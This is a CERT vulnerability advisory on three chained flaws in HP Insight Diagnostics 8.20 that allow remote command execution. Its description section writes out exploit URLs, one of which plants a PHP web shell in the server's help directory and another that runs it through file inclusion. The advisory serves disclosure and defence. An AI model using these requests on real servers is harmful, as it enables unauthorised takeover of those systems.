search menu icon-carat-right cmu-wordmark

CERT Coordination Center

HP Insight Diagnostics 8.20 b2878 multiple vulnerabilities

Vulnerability Note VU#324668

Original Release Date: 2013-06-10 | Last Revised: 2014-07-30

Overview

HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contains multiple vulnerabilities.

Description

It has been reported that HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contains multiple vulnerabilities that can be exploited by a remote attacker to execute arbitrary PHP code thus arbitrary commands with administrative privileges.

CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') - CVE-2013-3573

CWE-73: External Control of File Name or Path - CVE-2013-3574
HP Insight Diagnostics contains two vulnerabilities that together allow an attacker to inject arbitrary data into a file that is stored at an arbitrary location on the server via the "devicePath" parameter (formerly "mount" in older versions).
https://<host>:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program - CVE-2013-3575
HP Insight Diagnostics contains a local file inclusion vulnerability that is limited to ".html" inside the "<document-root>/hpdiags/frontend2/help/" directory.
https://<host>:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html

Impact

By combining these vulnerabilities, an authenticated remote attacker may be able to execute arbitrary commands on the server with administrator privileges.

Solution

We are currently unaware of a practical solution to this problem.

CVE-2013-3573 - Fixed in HP Insight Diagnostics 8.20 b2878
CVE-2013-3574 - Fixed in HP Insight Diagnostics 9.52
CVE-2013-3575 - Fixed in HP Insight Diagnostics 9.52

Restrict Network Access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from connecting to the service from a blocked network location.

Vendor Information

324668
 

Hewlett-Packard Company Affected

Notified:  April 05, 2013 Updated: June 06, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.


CVSS Metrics

Group Score Vector
Base 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Temporal 5 E:U/RL:U/RC:UC
Environmental 1.2 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

Acknowledgements

Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2013-3573, CVE-2013-3574, CVE-2013-3575
Date Public: 2013-06-10
Date First Published: 2013-06-10
Date Last Updated: 2014-07-30 06:35 UTC
Document Revision: 17

Sponsored by CISA.